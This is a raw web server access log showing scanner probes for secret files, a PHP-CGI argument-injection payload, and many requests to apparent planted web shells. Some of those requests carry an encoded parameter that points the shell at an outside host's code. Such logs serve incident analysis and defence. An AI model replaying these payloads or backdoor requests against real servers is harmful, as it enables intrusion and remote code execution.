179.188.53.243 - - [15/Mar/2026:01:59:24 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343336342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303736342q6235613364666264313363633439303666336262393436613937643764653937222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:59:47 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343338372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303738372q3832333034646237623863653037386535653632613330663662373561636362222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:03:33 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
209.38.208.202 - - [15/Mar/2026:02:05:16 -0300] "GET / HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
46.202.140.154 - - [15/Mar/2026:02:05:27 -0300] "GET / HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
31.169.53.47 - - [15/Mar/2026:02:05:30 -0300] "GET / HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.38.208.202 - - [15/Mar/2026:02:05:49 -0300] "GET /v2/_catalog HTTP/1.1" 404 196 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:05:34 -0300] "GET /console/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:05:37 -0300] "GET /server HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:05:40 -0300] "GET /server-status HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:05:43 -0300] "GET /about HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:05:46 -0300] "GET /login.action HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:05:50 -0300] "GET /.DS_Store HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:05:53 -0300] "GET /.env HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:05:57 -0300] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:01 -0300] "GET /.git/config HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:04 -0300] "POST /graphql HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:07 -0300] "POST /api HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:10 -0300] "POST /api/graphql HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:13 -0300] "POST /graphql/api HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:16 -0300] "POST /api/gql HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:17 -0300] "GET /s/334323e23353e2838313e2937313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:19 -0300] "GET /config.json HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:23 -0300] "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D\"\"+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 403 199 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
69.197.179.242 - - [15/Mar/2026:02:05:04 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
209.38.208.202 - - [15/Mar/2026:02:06:20 -0300] "GET /telescope/requests HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:25 -0300] "GET /.well-known/security.txt HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:28 -0300] "GET /actuator/env HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:32 -0300] "GET /swagger-ui.html HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:35 -0300] "GET /swagger/index.html HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:38 -0300] "GET /swagger/swagger-ui.html HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:39 -0300] "GET /webjars/swagger-ui/index.html HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
74.7.244.31 - - [15/Mar/2026:02:06:42 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
209.38.208.202 - - [15/Mar/2026:02:06:41 -0300] "GET /swagger.json HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:44 -0300] "GET /swagger/v1/swagger.json HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:47 -0300] "GET /v2/api-docs HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:50 -0300] "GET /v3/api-docs HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:53 -0300] "GET /api-docs/swagger.json HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:56 -0300] "GET /api/swagger.json HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:06:59 -0300] "GET /trace.axd HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:07:05 -0300] "GET /.vscode/sftp.json HTTP/1.1" 404 196 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:07:02 -0300] "GET /@vite/env HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:07:06 -0300] "OPTIONS / HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:07:09 -0300] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 72783 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.208.202 - - [15/Mar/2026:02:07:12 -0300] "GET /debug/default/view?panel=config HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
69.197.179.242 - - [15/Mar/2026:02:06:36 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
91.99.221.97 - - [15/Mar/2026:02:08:44 -0300] "GET / HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (compatible; bot/1.0)"
74.7.228.16 - - [15/Mar/2026:02:09:16 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
69.197.179.242 - - [15/Mar/2026:02:08:08 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:05:10 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343731302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313131302q3862626431383035643835613331323134363862346632376265373263613334222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:05:31 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343733312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313133312q6438336234326534343739653561326637313236343635363562323362393430222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:05:57 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343735372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313135372q3865626262383336376565633134326331366330636636613664643865616331222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:09:41 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:06:20 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343738302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313138302q6136323961383862646533343336643330653632326134666631633564343663222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:06:41 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343830312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313230312q3765313461383938316132383064363836346338323166383465373162643438222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [15/Mar/2026:02:11:51 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:02:07:02 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343832322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313232322q6661656230393338376266666365386565303663313634343266383933653137222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:07:24 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343834342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313234342q3631346333623833383239623866363339613332646565636235633034323834222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:11:14 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:07:45 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343836352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313236352q6234393931393563656165663162653831336261613632643833373237646536222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:08:07 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343838372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313238372q6362656562656365363866333730303937323861303934376563623230656335222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:08:28 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343930382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313330382q3337343339346436343730373632663666363466326535313132656432623331222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:08:49 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343932392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313332392q6264353634363736313062346139393937653233323461313866623263373964222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:09:10 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343935302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313335302q3865363932666434333433326431376462333133656238626130643463646431222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:12:47 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.228.16 - - [15/Mar/2026:02:14:26 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:02:09:31 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343937312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313337312q6534346437623261363965376238373664306261303762353935643436613063222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:09:53 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535343939332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313339332q3135643031393561323639366161333932376631363139643232366664393362222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:10:15 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353031352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313431352q3438393837663462616434376662613538343835393132643539636366316265222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:10:36 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353033362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313433362q3231386566336266653365353530616334323261363533366233663263313032222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:14:20 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:10:57 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353035372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313435372q6635333032313034623864613763393263363937336537366435353931393663222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:11:19 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353037392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313437392q6265333431336133636338373130613137313031346465336533386165633566222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:11:40 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353130302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313530302q6430663966653731393438313230376164343636646632643236623031653732222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
204.12.208.18 - - [15/Mar/2026:02:16:32 -0300] "GET /wp-includes/imddc187/edit.php HTTP/1.1" 200 6 "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
179.188.53.243 - - [15/Mar/2026:02:12:02 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353132322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313532322q3232393834363161663334653839653938636336343836396264383832653534222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [15/Mar/2026:02:17:07 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
69.197.179.242 - - [15/Mar/2026:02:15:54 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:12:23 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353134332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313534332q6366313532666437393438643961633936616639346234613536326230313566222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:12:45 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353136352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313536352q3233663032646363383962303534333861633430376430373765616330666130222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
